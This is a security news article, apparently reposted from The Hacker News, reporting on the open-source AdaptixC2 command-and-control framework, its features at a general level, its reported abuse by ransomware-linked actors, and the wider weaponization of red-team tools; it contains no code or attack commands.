AdaptixC2: Open-Source C2 Tool Gains Traction with Ransomware-Linked Actors

What AdaptixC2 is

AdaptixC2 is an extensible, open-source command-and-control (C2) and post-exploitation framework designed for red-team and adversary-emulation use. The server is implemented in Golang, while the GUI client is a C++ Qt application to support cross-platform use. Publicly released in an early form in August 2024, the project is positioned as a professional tool for penetration testers, but its design and public availability make it attractive for misuse.

Features and technical profile

AdaptixC2 offers a broad set of capabilities typical of modern C2 frameworks:

• Encrypted communications between operators and agents.
• Command execution and a remote interactive terminal.
• Credential management and screenshot capture.
• Extensible module/plugin model enabling additional functionality as needed.

Its modular architecture and cross-platform client make rapid development and deployment feasible for both legitimate red teams and malicious operators.

Abuse and malware ecosystem links

Security firms report growing criminal adoption of AdaptixC2. Several threat actors — including groups tied to the Fog and Akira ransomware operations — have been observed leveraging the framework. An initial access broker has reportedly used CountLoader in delivery chains that end with AdaptixC2 and other post-exploitation tools.

Palo Alto Networks Unit 42 described AdaptixC2 as modular and versatile, noting real-world abuse in social-engineering scams (fake help-desk calls over Microsoft Teams) and attacks that used AI-generated PowerShell scripts to automate post-exploitation tasks.

Discover your weakest link. Be proactive, not reactive. Cybercriminals need just one flaw to strike.

Developer, community, and risk signals

The original public iteration was published by a GitHub user known as RalfHacker (@HackerRalf), who self-identifies as a penetration tester and “MalDev.” Researchers at Silent Push highlighted several risk factors tied to the project’s community footprint:

• Public GitHub presence and linked email addresses.
• A high-subscribers Telegram channel (RalfHackerChannel) used to share AdaptixC2 updates and related content (reported to have ~28,000 subscribers).
• Public discussion about building a “public C2” and comparisons to frameworks like Empire.

Those community signals, combined with observed upticks in AdaptixC2 usage by actors linked to Russian-speaking cybercrime, raised red flags for some researchers — though direct criminal attribution of the developer has not been established publicly.

Why open-source C2 tools get weaponized

AdaptixC2’s trajectory mirrors a wider trend: free/red-team frameworks such as Havoc, Mythic, and Sliver — and historically, cracked versions of Cobalt Strike or Brute Ratel — are often repurposed by malicious actors because they:

• Lower technical barriers to advanced post-exploitation.
• Provide ready-made, maintained tooling for C2, lateral movement, and persistence.
• Allow operators to blend legitimate-looking tooling into attack chains.

Public availability plus active communities accelerate feature development, but also speed up criminal adoption and knowledge transfer.

Are u a security researcher? Or a company that writes articles about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing? If you want to express your idea in an article contact us here for a quote: [email protected]

Source: thehackernews.com

Source Link